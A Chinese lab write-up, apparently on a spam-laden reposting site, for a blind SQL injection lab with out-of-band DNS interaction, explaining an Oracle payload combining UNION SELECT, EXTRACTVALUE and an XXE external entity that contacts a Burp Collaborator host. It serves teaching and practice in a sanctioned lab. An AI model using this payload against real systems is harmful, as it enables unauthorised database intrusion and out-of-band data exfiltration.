当前位置: 首页 > wzjs >正文

合肥制作网站哪家好优化大师免费下载安装

合肥制作网站哪家好,优化大师免费下载安装,将一个网站拉入黑名单怎么做,做网站开票是多少个点的票文章目录 前言:进入实验室构造 payload 前言: 实验室标题为: 带外交互的 SQL 盲注 简介: 本实验包含一个SQL盲目注入漏洞。应用程序使用跟踪Cookie进行分析,并执行包含提交的Cookie值的SQL查询。 SQL查询是异步执…

文章目录

  • 前言:
  • 进入实验室
  • 构造 payload

前言:

实验室标题为:

带外交互的 SQL 盲注

简介:

本实验包含一个SQL盲目注入漏洞。应用程序使用跟踪Cookie进行分析,并执行包含提交的Cookie值的SQL查询。

SQL查询是异步执行的,对应用程序的响应没有影响。但是,您可以触发与外部域的带外交互。

要解决这个实验,利用SQL注入漏洞导致DNS查找Burp Collaborator。

注意

为了防止Academy平台被用于攻击第三方,我们的防火墙阻止了实验室与任意外部系统之间的交互。要解决实验,您必须使用Burp Collaborator的默认公共服务器。

提示:

你可以在我们的SQL注入备忘单上找到一些有用的有效载荷。

进入实验室

仍然是一个商店页面

构造 payload

在本关主要目的是体验 OOB(DNS 带外),DNS 外带的核心是让盲注变为显错注入,在无法利用漏洞获得回显的情况下,目标可以发起请求,这个时候就可以通关 DNS 请求把想获得的数据外带出来

依旧是使用 burp 进行抓包注入

利用 union 联合查询结合 xml 外部实体攻击(XXE)来构造 payload

TrackingId=x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://1prcgeu2pgeoycglrzqok5dsxj3ar2fr.oastify.com/"> %remote;]>'),'/l') FROM dual--

extractvalue()函数是 Oracle 数据库的 XML 函数,用于从 XML 片段中提取值

xmltype()构造是将字符串转换为 Oracle 的 XMLtype 对象,强制解析 XML 内容

打开 burp 中的 Collaborator,复制链接

将 payload 粘贴在 cookie 后面,并进行 url 编码

返回 Collaborator 模块,点击 Poll now,可以看到返回四个域名,以及对应的源 ip 地址

返回商店页面,可以看到通关提示

http://www.dtcms.com/wzjs/12161.html

相关文章:

  • 深圳宝安区住房和建设局网站推广活动策划方案范文
  • 每个惠州seo招聘
  • 三级a一级a做爰视频网站新品推广活动方案
  • 邯郸单位网站建设衡阳网站优化公司
  • 南宁网络推广建站百度识图在线使用一下
  • 如何做网站的教程视频广州网络推广培训
  • 制作网站的工作流程哪些网站是营销型网站
  • ubuntu写wordpress湖北seo整站优化
  • 做竞猜网站犯法吗苏州网站优化公司
  • 网站设计论坛百度seo技术优化
  • 网站平台策划方案太原全网推广
  • 深圳高端做网站公司站长之家app
  • 四川成都最新疫情分布图系统优化大师官方下载
  • 贸易网站有哪些磁力bt种子搜索
  • 郑州建站怎么操作怎么去营销自己的产品
  • wordpress5.0.1 bug陕西整站关键词自然排名优化
  • 网上有什么做兼职的网站四川百度推广和seo优化
  • 中国建设协会官方网站山东一级造价师
  • 南京建设网站方案可以入侵的网站
  • 做网站推广需要花多少钱怎么成为百度推广代理商
  • 建设银行etc官方网站惠州seo外包费用
  • 上海传媒公司ceoseo外链工具软件
  • 做社群的网站有哪些企业网站模板免费
  • 响应式网站常用宽度网站seo策划方案实例
  • 公司要建设网站需要那些程序新闻发稿平台
  • 建设网站选什么地方的主机怎么推广app让人去下载
  • 襄阳商城网站建设百家号自媒体平台注册
  • 江苏连云港网站建设公司营销案例最新
  • 专业做俄语网站建设网站建设制作模板
  • 宝安网站建设公司企业网站推广建议